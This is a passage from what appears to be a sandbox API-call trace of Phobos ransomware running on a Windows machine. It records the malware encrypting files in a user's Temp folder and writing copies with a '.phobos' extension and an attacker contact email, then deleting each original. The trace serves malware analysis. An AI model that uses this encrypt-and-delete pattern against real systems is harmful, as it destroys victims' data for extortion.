lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7bc7, lpOverlapped=0x0) returned 1 [0191.598] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7bd0, dwBufLen=0x7bd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7bd0) returned 1 [0191.599] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7bd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7bd0, lpOverlapped=0x0) returned 1 [0191.600] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0191.600] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.600] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0191.600] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.600] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0191.600] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.600] CloseHandle (hObject=0x178) returned 1 [0191.600] CloseHandle (hObject=0x14c) returned 1 [0191.600] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv")) returned 1 [0191.601] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.602] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=14424) returned 1 [0191.602] CloseHandle (hObject=0x14c) returned 1 [0191.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif")) returned 0x2020 [0191.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.602] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.602] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.603] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.603] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3858, lpOverlapped=0x0) returned 1 [0191.604] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3860, dwBufLen=0x3860 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3860) returned 1 [0191.604] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3860, lpOverlapped=0x0) returned 1 [0191.605] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0191.605] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.605] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0191.605] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.605] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0191.605] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.605] CloseHandle (hObject=0x14c) returned 1 [0191.605] CloseHandle (hObject=0x178) returned 1 [0191.605] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eSApLxOukBvfceugk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\esaplxoukbvfceugk.gif")) returned 1 [0191.606] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.607] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0191.607] CloseHandle (hObject=0x178) returned 1 [0191.607] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.608] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=62091) returned 1 [0191.608] CloseHandle (hObject=0x178) returned 1 [0191.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp")) returned 0x2020 [0191.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.608] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.608] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.608] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.608] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf28b, lpOverlapped=0x0) returned 1 [0191.610] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf290, dwBufLen=0xf290 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf290) returned 1 [0191.610] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf290, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf290, lpOverlapped=0x0) returned 1 [0191.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0191.612] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.612] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0191.612] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.612] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0191.612] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.612] CloseHandle (hObject=0x178) returned 1 [0191.612] CloseHandle (hObject=0x14c) returned 1 [0191.612] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Hbl3xkp8irsS-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hbl3xkp8irss-.bmp")) returned 1 [0191.613] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.614] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=145) returned 1 [0191.614] CloseHandle (hObject=0x14c) returned 1 [0191.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini")) returned 0x2006 [0191.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.615] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.615] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.617] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.617] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.617] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0191.618] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0191.618] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0191.619] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0191.619] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.619] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0191.619] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.619] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0191.619] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.619] CloseHandle (hObject=0x14c) returned 1 [0191.619] CloseHandle (hObject=0x178) returned 1 [0191.619] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini")) returned 1 [0191.620] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.621] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0191.621] CloseHandle (hObject=0x178) returned 1 [0191.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat")) returned 0x2026 [0191.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.621] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.621] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0191.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0191.673] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.673] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0191.965] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0191.965] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0191.991] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0191.991] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.991] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0191.991] CryptDestroyKey (hKey=0xa32a68) returned 1 [0191.991] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0191.992] CryptDestroyKey (hKey=0xa327e8) returned 1 [0191.992] CloseHandle (hObject=0x178) returned 1 [0191.992] CloseHandle (hObject=0x164) returned 1 [0191.992] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat")) returned 1 [0191.993] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0191.994] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=63684) returned 1 [0191.994] CloseHandle (hObject=0x164) returned 1 [0191.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a")) returned 0x2020 [0191.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0191.994] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.994] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.995] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0191.995] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.995] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf8c4, lpOverlapped=0x0) returned 1 [0192.424] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf8d0, dwBufLen=0xf8d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf8d0) returned 1 [0192.424] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf8d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf8d0, lpOverlapped=0x0) returned 1 